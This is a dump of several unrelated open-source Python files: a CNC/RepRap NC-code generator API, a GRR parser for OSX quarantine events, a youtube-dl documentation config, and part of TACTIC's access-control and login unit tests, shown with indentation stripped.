## NC code creator for additive machines like RepRap
def wipe(self):
"""wipe routine"""
pass
def extruder_on(self):
"""Turn on the extruder"""
pass
def extruder_off(self):
"""turn off the extruder"""
pass
def set_extruder_flowrate(self, flowrate):
"""Set the flowrate for the extruder"""
pass
def extruder_temp(self, temp):
"""Set the extruder temp in celsius"""
pass
def fan_on(self):
"""turn on the cooling fan"""
pass
def fan_off(self):
"""turn off the cooling fan"""
pass
def build_bed_temp(self, temp):
"""Set the bed temp in celsius"""
pass
def chamber_temp(self, temp):
"""Set the chamber temp in celsius"""
pass
def begin_ncblock(self):
# if the moves have come from backplotting nc code, then the nc code text can be given with these three functions
pass
def end_ncblock(self):
pass
def add_text(self, s, col, cdata):
pass
################################################################################
creator = Creator()
############################################################################
## Internals
def write(s):
creator.write(s)
def output(filename):
creator.file_open(filename)
############################################################################
## Programs
def program_begin(id, name=''):
creator.program_begin(id, name)
def add_stock(type_name, params):
creator.add_stock(type_name, params)
def program_stop(optional=False):
creator.program_stop(optional)
def program_end():
creator.program_end()
def flush_nc():
creator.flush_nc()
############################################################################
## Subprograms
def sub_begin(id, name=''):
creator.sub_begin(id, name)
def sub_call(id):
creator.sub_call(id)
def sub_end():
creator.sub_end()
############################################################################
## Settings
def imperial():
creator.imperial()
def metric():
creator.metric()
def absolute():
creator.absolute()
def incremental():
creator.incremental()
def polar(on=True):
creator.polar(on)
def set_plane(plane):
creator.set_plane(plane)
def set_temporary_origin(x=None, y=None, z=None, a=None, b=None, c=None):
creator.set_temporary_origin(x,y,z,a,b,c)
def remove_temporary_origin():
creator.remove_temporary_origin()
############################################################################
## Tools
def tool_change(id):
creator.tool_change(id)
def tool_defn(id, name='', params=None):
creator.tool_defn(id, name, params)
def offset_radius(id, radius=None):
creator.offset_radius(id, radius)
def offset_length(id, length=None):
creator.offset_length(id, length)
def current_tool(self):
return creator.current_tool()
############################################################################
## Datums
def datum_shift(x=None, y=None, z=None, a=None, b=None, c=None):
creator.datum_shift(x, y, z, a, b, c)
def datum_set(x=None, y=None, z=None, a=None, b=None, c=None):
creator.datum_set(x, y, z, a, b, c)
def workplane(id):
creator.workplane(id)
def clearanceplane(z=None):
creator.clearanceplane(z)
############################################################################
## APT360 like Transformation Definitions
## These definitions were created while looking at Irvin Kraal's book on APT
## - Numerical Control Progamming in APT - page 211
def matrix(a1=None,b1=None,c1=None,a2=None,b2=None,c2=None,a3=None,b3=None,c3=None):
creator.matrix(a1,b1,c1,a2,b2,c2,a3,b3,c3)
def translate(x=None,y=None,z=None):
creator.translate(x,y,z)
def rotate(xyrot=None,yzrot=None,zxrot=None,angle=None):
creator.rotate(xyrot,yzrot,zxrot,angle)
def scale(k=None):
creator.scale(k)
def matrix_product(matrix1=None,matrix2=None):
creator.matrix_product(matrix1,matrix2)
def mirror_plane(plane1=None,plane2=None,plane3=None):
creator.mirror_plane(plane1,plane2,plane3)
def mirror_line(line=None):
creator.mirror_line(line)
############################################################################
## Rates + Modes
def feedrate(f):
creator.feedrate(f)
def feedrate_hv(fh, fv):
creator.feedrate_hv(fh, fv)
def spindle(s, clockwise=True):
creator.spindle(s, clockwise)
def coolant(mode=0):
creator.coolant(mode)
def gearrange(gear=0):
creator.gearrange(gear)
############################################################################
## Moves
def rapid(x=None, y=None, z=None, a=None, b=None, c=None):
creator.rapid(x, y, z, a, b, c)
def feed(x=None, y=None, z=None, a = None, b = None, c = None):
creator.feed(x, y, z)
def arc_cw(x=None, y=None, z=None, i=None, j=None, k=None, r=None):
creator.arc_cw(x, y, z, i, j, k, r)
def arc_ccw(x=None, y=None, z=None, i=None, j=None, k=None, r=None):
creator.arc_ccw(x, y, z, i, j, k, r)
def dwell(t):
creator.dwell(t)
def rapid_home(x=None, y=None, z=None, a=None, b=None, c=None):
creator.rapid_home(x, y, z, a, b, c)
def rapid_unhome():
creator.rapid_unhome()
def set_machine_coordinates():
creator.set_machine_coordinates()
############################################################################
## Cutter radius compensation
def use_CRC():
return creator.use_CRC()
def CRC_nominal_path():
return creator.CRC_nominal_path()
def start_CRC(left = True, radius = 0.0):
creator.start_CRC(left, radius)
def end_CRC():
creator.end_CRC()
############################################################################
## Cycles
def pattern():
creator.pattern()
def pocket():
creator.pocket()
def profile():
creator.profile()
def drill(x=None, y=None, dwell=None, depthparams = None, retract_mode=None, spindle_mode=None, internal_coolant_on=None, rapid_to_clearance=None):
creator.drill(x, y, dwell, depthparams, retract_mode, spindle_mode, internal_coolant_on, rapid_to_clearance)
def tap(x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, pitch=None, stoppos=None, spin_in=None, spin_out=None, tap_mode=None, direction=None):
creator.tap(x, y, z, zretract, depth, standoff, dwell_bottom, pitch, stoppos, spin_in, spin_out, tap_mode, direction)
def bore(x=None, y=None, z=None, zretract=None, depth=None, standoff=None, dwell_bottom=None, feed_in=None, feed_out=None, stoppos=None, shift_back=None, shift_right=None, backbore=False, stop=False):
creator.bore(x, y, z, zretract, depth, standoff, dwell_Bottom, feed_in, feed_out, stoppos, shift_back, shift_right, backbore, stop)
def end_canned_cycle():
creator.end_canned_cycle()
def peck(count, first, last=None, step=0.0):
pecks = []
peck = first
if (last == None) : last = first
for i in range(0,count):
pecks.append(peck)
if (peck - step > last) : peck -= step
return pecks
############################################################################
## Misc
def comment(text):
creator.comment(text)
def insert(text):
creator.insert(text)
def block_delete(on=False):
creator.block_delete(on)
def variable(id):
creator.variable(id)
def variable_set(id, value):
creator.variable_set(id, value)
def probe_single_point(point_along_edge_x=None, point_along_edge_y=None, depth=None, retracted_point_x=None, retracted_point_y=None, destination_point_x=None, destination_point_y=None, intersection_variable_x=None, intersection_variable_y=None, probe_offset_x_component=None, probe_offset_y_component=None ):
creator.probe_single_point(point_along_edge_x, point_along_edge_y, depth, retracted_point_x, retracted_point_y, destination_point_x, destination_point_y, intersection_variable_x, intersection_variable_y, probe_offset_x_component, probe_offset_y_component )
def probe_downward_point(x=None, y=None, depth=None, intersection_variable_z=None):
creator.probe_downward_point(x, y, depth, intersection_variable_z)
def report_probe_results(x1=None, y1=None, z1=None, x2=None, y2=None, z2=None, x3=None, y3=None, z3=None, x4=None, y4=None, z4=None, x5=None, y5=None, z5=None, x6=None, y6=None, z6=None, xml_file_name=None ):
creator.report_probe_results(x1, y1, z1, x2, y2, z2, x3, y3, z3, x4, y4, z4, x5, y5, z5, x6, y6, z6, xml_file_name)
def open_log_file(xml_file_name=None ):
creator.open_log_file(xml_file_name)
def log_coordinate(x=None, y=None, z=None):
creator.log_coordinate(x, y, z)
def log_message(message=None):
creator.log_message(message)
def close_log_file():
creator.close_log_file()
def rapid_to_midpoint(x1=None, y1=None, z1=None, x2=None, y2=None, z2=None):
creator.rapid_to_midpoint(x1, y1, z1, x2, y2, z2)
def rapid_to_intersection(x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub):
creator.rapid_to_intersection(x1, y1, x2, y2, x3, y3, x4, y4, intersection_x, intersection_y, ua_numerator, ua_denominator, ua, ub_numerator, ub)
def rapid_to_rotated_coordinate(x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final):
creator.rapid_to_rotated_coordinate(x1, y1, x2, y2, ref_x, ref_y, x_current, y_current, x_final, y_final)
def set_path_control_mode(mode, motion_blending_tolerance, naive_cam_tolerance ):
creator.set_path_control_mode(mode, motion_blending_tolerance, naive_cam_tolerance )
############################################################################
## NC code creator for additive machines like RepRap
def wipe():
creator.wipe()
def extruder_on():
creator.extruder_on()
def extruder_off():
creator.extruder_off()
def set_extruder_flowrate(flowrate):
creator.set_extruder_flowrate(flowrate)
def extruder_temp(temp=None):
creator.extruder_temp(temp)
def fan_on():
creator.fan_on()
def fan_off():
creator.fan_off()
def build_bed_temp(temp=None):
creator.build_bed_temp(temp)
def chamber_temp(temp=None):
creator.chamber_temp(temp)
| mit |
MiniSEC/GRR_clone | parsers/osx_quarantine.py | 6 | 2638 | #!/usr/bin/env python
#
# Copyright 2012 Google Inc. All Rights Reserved.
"""Parser for OSX quarantine sqlite files."""
__program__ = "osx_quarantine.py"
import datetime
import glob
import locale
import sys
from grr.parsers import sqlite_file
class OSXQuarantineEvents(sqlite_file.SQLiteFile):
"""Class for handling the parsing of a OSX quarantine events.
Use as:
c = OSXQuarantineEvents(open('com.apple.LaunchServices.QuarantineEvents'))
for event in c.Parse():
print event
"""
# OSX Timestamp is seconds since January 1st 2001.
EVENTS_QUERY = ("select (LSQuarantineTimeStamp+978328800)*1e6,"
"LSQuarantineAgentBundleIdentifier, LSQuarantineAgentName,"
"LSQuarantineDataURLString, LSQuarantineSenderName,"
"LSQuarantineSenderAddress, LSQuarantineTypeNumber,"
"LSQuarantineOriginTitle, LSQuarantineOriginURLString,"
"LSQuarantineOriginAlias "
"from LSQuarantineEvent "
"ORDER BY LSQuarantineTimeStamp"
)
def Parse(self):
"""Iterator returning dict for each entry in history."""
for data in self.Query(self.EVENTS_QUERY):
(timestamp, agent_bundle_identifier, agent_name, url, sender,
sender_address, type_number, title, referrer, referrer_alias) = data
yield [timestamp, "OSX_QUARANTINE", url, referrer, title, agent_name,
agent_bundle_identifier, sender, sender_address, type_number,
referrer_alias]
def main(argv):
if len(argv) < 2:
print "Usage: %s com.apple.LaunchServices.QuarantineEvents" % __program__
sys.exit(1)
encoding = locale.getpreferredencoding()
if encoding.upper() != "UTF-8":
print "%s requires an UTF-8 capable console/terminal" % __program__
sys.exit(1)
files_to_process = []
for input_glob in argv[1:]:
files_to_process += glob.glob(input_glob)
for input_file in files_to_process:
events = OSXQuarantineEvents(open(input_file))
for data in events.Parse():
timestamp, entry_type, url, data1, data2, data3, _, _, _, _, _ = data
try:
date_string = datetime.datetime(1970, 1, 1)
date_string += datetime.timedelta(microseconds=timestamp)
date_string = u"%s+00:00" % (date_string)
except TypeError:
date_string = timestamp
except ValueError:
date_string = timestamp
output_string = u"%s\t%s\t%s\t%s\t%s\t%s" % (
date_string, entry_type, url, data1, data2, data3)
print output_string.encode("UTF-8")
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 |
rbrito/pkg-youtube-dl | docs/conf.py | 39 | 2276 | # coding: utf-8
#
# youtube-dl documentation build configuration file, created by
# sphinx-quickstart on Fri Mar 14 21:05:43 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Allows to import youtube_dl
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'youtube-dl'
copyright = u'2014, Ricardo Garcia Gonzalez'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from youtube_dl.version import __version__
version = __version__
# The full version, including alpha/beta/rc tags.
release = version
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'youtube-dldoc'
| unlicense |
Southpaw-TACTIC/TACTIC | src/pyasm/security/security_test.py | 1 | 30165 | #!/usr/bin/env python
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ["SecurityTest"]
import tacticenv
from pyasm.common import Environment, SecurityException, Xml, Config
from pyasm.search import *
from pyasm.unittest import *
from pyasm.biz import Project, ExpressionParser
from pyasm.security import Login
from .security import *
from .drupal_password_hasher import DrupalPasswordHasher
from .access_manager import *
from .batch import *
from .crypto_key import *
import unittest
class SecurityTest(unittest.TestCase):
def _setup(self):
# intialiaze the framework as a batch process
Site.set_site('default')
security = Environment.get_security()
from pyasm.biz import Project
Project.set_project("unittest")
self.security = Environment.get_security()
self.user = 'unittest_guy'
self.password = 'cow'
self.encrypted = Login.encrypt_password(self.password)
self.person = None
# start a transaction
self.transaction = Transaction.get(create=True)
#self.transaction.start()
# IF Portal
portal_enabled = Config.get_value("portal", "enabled") == "true"
if portal_enabled:
try:
site = Site.set_site("default")
# create the user
login = SObjectFactory.create("portal/client")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.commit()
finally:
Site.pop_site()
# create the user
login = SObjectFactory.create("sthpw/login")
login.set_value("login", self.user)
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
s = Search('sthpw/login_group')
s.add_filter('login_group','user')
group = s.get_sobject()
if not group:
group = SObjectFactory.create("sthpw/login_group")
group.set_value("login_group", 'user')
group.set_value('access_level','min')
group.commit()
s = Search('sthpw/login_in_group')
s.add_filter('login',self.user)
s.add_filter('login_group', 'user')
lng = s.get_sobject()
if lng:
lng.delete()
# create the user2
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_gal')
login.set_value("password", self.encrypted)
login.set_value("login_groups", "test")
login.commit()
# create the user3 and add to a group
login = SObjectFactory.create("sthpw/login")
login.set_value("login", 'unittest_dan')
login.set_value("password", self.encrypted)
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'unittest_med')
login.commit()
login = SObjectFactory.create("sthpw/login_group")
login.set_value("login_group", 'test')
login.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", 'unittest_dan')
l_in_g.set_value("login_group", 'unittest_med')
l_in_g.commit()
l_in_g = SObjectFactory.create("sthpw/login_in_group")
l_in_g.set_value("login", self.user)
l_in_g.set_value("login_group", 'test')
l_in_g.commit()
def _tear_down(self):
#self.transaction = Transaction.get()
self.transaction.rollback()
# this is necessary cuz the set_value() was caught in a security exception possibly, needs investigation
#if self.person:
# self.person.delete()
tasks = Search.eval("@SOBJECT(sthpw/task['project_code','in','unittest|sample3d'])")
for task in tasks:
task.delete(triggers=False)
def test_all(self):
batch = Batch()
Environment.get_security().set_admin(True)
from pyasm.unittest import UnittestEnvironment, Sample3dEnvironment
test_env = UnittestEnvironment()
test_env.create()
sample3d_env = Sample3dEnvironment(project_code='sample3d')
sample3d_env.create()
Project.set_project("unittest")
try:
self.access_manager = Environment.get_security().get_access_manager()
self._test_all()
finally:
# Reset access manager for tear down
Environment.get_security()._access_manager = self.access_manager
Environment.get_security().reset_access_manager()
self._tear_down()
Environment.get_security().set_admin(True)
test_env.delete()
Environment.get_security().set_admin(True)
sample3d_env.delete()
Site.pop_site()
def _test_initial_access_level(self):
# before adding process unittest_guy in user group is in MIN access_level
# so no access to process, but access to search_types
self.security.set_admin(False)
security = Environment.get_security()
process_keys = [{'process': 'anim'}]
proc_access = security.check_access("process", process_keys, "allow")
self.assertEqual(proc_access, False)
stype_keys = [{'code':'*'}, {'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, True)
# we don't have this sType specified explicitly, should be False
stype_keys = [{'code':'unittest/city'}]
stype_access = security.check_access("search_type", stype_keys, "allow")
a = security.get_access_manager()
self.assertEqual(stype_access, False)
def _test_all(self):
try:
self._setup()
self._test_crypto()
self._test_drupal()
self._test_security_fail()
self._test_security_pass()
self._test_initial_access_level()
self._test_sobject_access_manager()
# order matters here
self._test_search_filter()
self._test_access_level()
self._test_access_manager()
self._test_guest_allow()
except Exception as e:
print("Error: ", e)
raise
def _test_drupal(self):
password = "tactic"
salt = "DPRNKWLY"
new = DrupalPasswordHasher().encode(password, salt, 'D')
encoded = "$S$DDPRNKWLY5IwB.aQlCm/OLRrFxZmpa7Rk/kjm/J45bGNGTXUsRxq"
self.assertEqual(new, encoded)
verify = DrupalPasswordHasher().verify("tactic", encoded)
self.assertEqual(True, verify)
def _test_security_fail(self):
# should fail
password = 'test'
fail = False
try:
self.security.login_user(self.user,password)
except SecurityException as e:
fail = True
self.assertEqual( True, fail )
def _test_security_pass(self):
fail = False
try:
self.security.login_user(self.user,self.password)
except SecurityException as e:
fail = True
user = Environment.get_user_name()
# set this user as admin
self.security.set_admin(True)
self.assertEqual('unittest_guy', user)
self.assertEqual( False, fail )
def count(self, it):
from collections import defaultdict
d = defaultdict(int)
for j in it:
d[j] += 1
return d
def _test_search_filter(self):
# NOTE: this unittest is flawed because it relies on project
# that may not exist
self.security.set_admin(False)
# exclude sample3d tasks and include unittest tasks only
rules = """
<rules>
<rule value='sample3d' search_type='sthpw/task' column='project_code' op='!=' group='search_filter'/>
<rule value='unittest' search_type='sthpw/task' column='project_code' group='search_filter'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(False, 'sample3d' in project_codes)
self.assertEqual(True, 'unittest' in project_codes)
# test list-based expression
rules = """
<rules>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value="@GET(sthpw/login['login','EQ','unittest'].login)" search_type='sthpw/task' op='in' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
self.security.set_admin(False)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 3 tasks were created above for a person
self.assertEqual(3, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual({'unittest_guy': 1,'unittest_gal': 1}, self.count(assigned_codes))
self.assertEqual(True, ['unittest'] == project_codes)
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule group="project" code='art' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='*'/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
security = Environment.get_security()
security.reset_access_manager()
access_manager = security.get_access_manager()
access_manager.add_xml_rules(xml)
search = Search('sthpw/task')
tasks = search.get_sobjects()
# 2 tasks were created above for unittest_guy
self.assertEqual(2, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['unittest'] == project_codes)
Project.set_project('sample3d')
try:
search = Search('sthpw/task')
tasks = search.get_sobjects()
self.assertEqual(1, len(tasks))
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
self.assertEqual(True, ['unittest_guy'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
finally:
Project.set_project('unittest')
# project specific rule
proj_rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule group="project" code='unittest' access='allow'/>
<rule value='$PROJECT' search_type='sthpw/task' column='project_code' group='search_filter'/>
<rule value='@GET(login.login)' search_type='sthpw/task' column='assigned' group='search_filter' project='unittest'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
project = Project.get_by_code('sample3d')
if project:
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
assigned_codes = SObject.get_values(tasks,'assigned', unique=True)
project_codes = SObject.get_values(tasks,'project_code', unique=True)
# should fail since project is switched to sample3d.. and it should have more than just unittest
self.assertEqual(False, ['unittest'] == assigned_codes)
self.assertEqual(True, ['sample3d'] == project_codes)
# unittest specific rule that uses negation !=, this takes care of NULL value automatically
rules = """
<rules>
<rule group="project" code='sample3d' access='allow'/>
<rule value='5' search_type='sthpw/task' column='priority' op='!=' group='search_filter' project='sample3d'/>
<rule group="process" process="anim" access="allow"/>
<rule group="process" process="comp" access="allow"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
Project.set_project('sample3d')
search = Search('sthpw/task')
tasks = search.get_sobjects()
priorities = SObject.get_values(tasks,'priority', unique=True)
#project_codes = SObject.get_values(tasks,'project_code', unique=True)
for p in priorities:
self.assertEqual(True, p != 5)
try:
Project.set_project('unittest')
except SecurityException as e:
# should get an SecurityException
self.assertEqual('User [unittest_guy] is not permitted to view project [unittest]', e.__str__())
xml = Xml()
xml.read_string(proj_rules)
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
except Exception as e:
print("Error : %s", str(e))
else:
# this should not happen
raise Exception('unittest_guy should not be allowed to use Project unittest here.')
# One should be able to insert a task that is outside the query restriction of the above rule
task = SearchType.create('sthpw/task')
task.set_sobject_value(self.person)
task.set_value('assigned', 'made_up_login')
task.set_value('project_code', 'sample3d')
task.set_value('description', 'a new task')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
self.assertEqual('made_up_login', task.get_value('assigned'))
# DEPRECATED: column level security has been disabled for now (for
# performance reasons)
def _test_sobject_access_manager(self):
'''test a more realistic example'''
# create a test person
person = Person.create("Donald", "Duck", "DisneyLand", "A duck!!!")
self.person = person
for project_code in ['unittest','unittest','sample3d']:
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_guy')
task.set_value('project_code', project_code)
task.set_value('description', 'do something good')
task.set_value('process', 'unittest')
task.set_value('context', 'unittest')
task.commit()
# an extra task for list-based search_filter test
task = SearchType.create('sthpw/task')
task.set_sobject_value(person)
task.set_value('assigned', 'unittest_gal')
task.set_value('project_code', 'unittest')
task.set_value('description', 'do something good')
task.set_value('process', 'unittest2')
task.set_value('context', 'unittest2')
task.commit()
# add these rules to the current user
rules = """
<rules>
<rule group="sobject_column" default="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_first" access="edit"/>
<rule group="sobject_column" search_type="unittest/person" column="name_last" access="deny"/>
<rule group="sobject_column" search_type="unittest/person" column="nationality" access="deny"/>
</rules>
"""
xml = Xml()
xml.read_string(rules)
access_manager = Environment.get_security().get_access_manager()
access_manager.add_xml_rules(xml)
# disable admin for this test
access_manager.set_admin(False)
# should succeed
person.set_value("name_first", "Donny")
# should fail
try:
person.set_value("name_last", "Ducky")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
# should succeed
name_last = person.get_value("name_last")
self.assertEqual("Duck", name_last)
# should fail
# DISABLED for now since Search._check_value_security() is commented out
"""
try:
nationality = person.get_value("nationality")
except SecurityException as e:
pass
else:
self.fail("Expected a SecurityException")
"""
# disable admin for this test
access_manager.set_admin(True)
def _test_access_manager(self):
# reset it
Environment.get_security().reset_access_manager()
access_manager = Environment.get_security().get_access_manager()
xml = Xml()
xml.read_string('''
<rules>
<rule group='sobject' key='corporate/budget' access='allow'/>
<rule group='sobject' key='corporate/salary' access='allow'/>
<rule group='sobject' key='prod/asset' access='edit'/>
<rule group='sobject' search_type='sthpw/note' project='sample3d' access='edit'/>
<group type='url' default='deny'>
<rule key='/tactic/bar/Partner' access='view'/>
<rule key='/tactic/bar/External' access='view'/>
</group>
<rule group='sobject' search_type='prod/layer' project='sample3d' access='view'/>
<rule column='description' search_type='prod/shot' access='view' group='sobject_column'/>
<group type='sobject_column' default='edit'>
<rule key='prod/asset|director_notes' access='deny'/>
<rule key='prod/asset|sensitive_data' access='deny'/>
</group>
<rule group='search_type' code='prod/asset' access='allow'/>
<rule group='search_type' code='sthpw/note' project='unittest' access='edit'/>
<rule group='search_type' code='unittest/person' project='unittest' access='allow'/>
<rule group='builtin' key='view_site_admin' access='allow'/>
<rule group='builtin' key='export_all_csv' project='unittest' access='allow'/>
<rule group='builtin' key='import_csv' access='allow'/>
<rule group='builtin' key='retire_delete' project='*' access='allow'/>
<rule group='builtin' key='view_side_bar' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml)
# try mixing in a 2nd login_group rule with a project override, mimmicking a
# login_group with project_code. but project group is special it doesn't get the usual
# project_override treatment
xml2 = Xml()
xml2.read_string('''
<rules>
<rule group="project" code="sample3d" access="allow"/>
<rule group="project" code="unittest" access="allow"/>
<rule group='builtin' key='view_side_bar' project='sample3d' access='allow'/>
</rules>
''')
access_manager.add_xml_rules(xml2)
access_manager.print_rules('project')
test = access_manager.check_access('builtin', 'view_site_admin','allow')
self.assertEqual(test, True)
Project.set_project('sample3d')
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, False)
# old way of checking project
test = access_manager.check_access('project', 'sample3d','allow')
self.assertEqual(test, True)
Project.set_project('unittest')
# old way should work as well
test = access_manager.check_access('builtin', 'export_all_csv','allow')
self.assertEqual(test, True)
# default to the system's hardcoded deny for builtin
test = access_manager.check_access('builtin', 'export_all_csv','allow', default='deny')
self.assertEqual(test, True)
# this is the new way to control per project csv export
keys = [{'key':'export_all_csv', 'project': 'unittest'}, {'key':'export_all_csv','project': '*'}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
keys = [{'key':'import_csv', 'project': '*'}, {'key':'import_csv','project': Project.get_project_code()}]
test = access_manager.check_access('builtin', keys ,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'view_side_bar','allow')
self.assertEqual(test, True)
key = { "project": 'unittest', 'key':'view_side_bar' }
key1 = { "project": 'sample3d', 'key':'view_side_bar' }
key2 = { "project": "*",'key': 'view_side_bar' }
keys = [key, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
keys = [key1, key2]
test = access_manager.check_access('builtin', keys,'allow')
self.assertEqual(test, True)
test = access_manager.check_access('builtin', 'retire_delete','allow')
self.assertEqual(test, True)
# test sensitive sobject
test = access_manager.get_access('sobject', 'corporate/budget')
self.assertEqual(test, "allow")
# test allowed sobject
test = access_manager.get_access('sobject', 'prod/asset')
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', [{'search_type':'sthpw/note', 'project':'sample3d'}])
self.assertEqual(test, "edit")
# test url
test = access_manager.get_access('url', '/tactic/bar/Partner')
self.assertEqual(test, "view")
# test with access values ... a more typical usage
test = access_manager.check_access('sobject','prod/asset','view')
self.assertEqual(test, True)
test = access_manager.check_access('sobject','corporate/budget','edit')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column', 'prod/asset|director_notes','deny')
self.assertEqual(test, True)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'edit')
self.assertEqual(test, False)
test = access_manager.check_access('sobject_column',{'search_type':'prod/shot','column':'description'},'view')
self.assertEqual(test, True)
test = access_manager.get_access('sobject', {'search_type':'sthpw/note', 'project':'sample3d'} )
self.assertEqual(test, "edit")
test = access_manager.get_access('sobject', {'search_type':'sthpw/note'} )
self.assertEqual(test, None)
test = access_manager.get_access('sobject', {'search_type':'prod/layer', 'project':'sample3d'} )
self.assertEqual(test, "view")
test = access_manager.get_access('sobject', 'prod/layer' )
self.assertEqual(test, None)
Project.set_project('sample3d')
# security version 2 uses group = search_type
asset = SearchType.create('prod/asset')
asset.set_value('name','unit test obj')
asset.commit(triggers=False)
# replace the access manager with this
Environment.get_security()._access_manager = access_manager
test = access_manager.check_access('search_type',{'search_type':'prod/asset','project':'sample3d'},'delete')
self.assertEqual(test, False)
asset.delete()
note = SearchType.create('sthpw/note')
note.set_value('note','unit test note obj')
note.set_value('project_code','unittest')
note.commit(triggers=False)
test = access_manager.get_access('search_type', [{'code':'sthpw/note', 'project':'unittest'}] )
self.assertEqual(test, 'edit')
msg = ''
# delete of unittest note should fail
try:
note.delete()
except SObjectException as e:
msg = 'delete error'
self.assertEqual(msg, 'delete error')
note = SearchType.create('sthpw/note')
note.set_value('note','unit test sample3d note obj')
note.set_value('project_code','sample3d')
note.commit(triggers=False)
# this should pass since it's a sthpw/ prefix
note.delete()
test = access_manager.check_access('search_type',{'search_type':'sthpw/note','project':'unittest'},'delete')
self.assertEqual(test, False)
self.assertEqual('unittest_guy', Environment.get_user_name())
def _test_crypto(self):
key = CryptoKey()
key.generate()
# test verifying a string
test_string = "Holy Moly"
signature = key.get_signature(test_string)
check = key.verify(test_string, signature)
self.assertEqual(True, check)
# verify an incorrect string
check = key.verify("whatever", signature)
self.assertEqual(False, check)
# encrypt and decrypt a string
test_string = "This is crazy"
coded = key.encrypt(test_string)
# create a new key
private_key = key.get_private_key()
key2 = CryptoKey()
key2.set_private_key(private_key)
test_string2 = key2.decrypt(coded)
self.assertEqual(test_string, test_string2)
def _test_access_level(self):
security = Environment.get_security()
from pyasm.security import get_security_version
security_version = get_security_version()
projects = Search.eval('@SOBJECT(sthpw/project)')
if security_version >= 2:
for project in projects:
key = { "code": project.get_code() }
key2 = { "code": "*" }
keys = [key, key2]
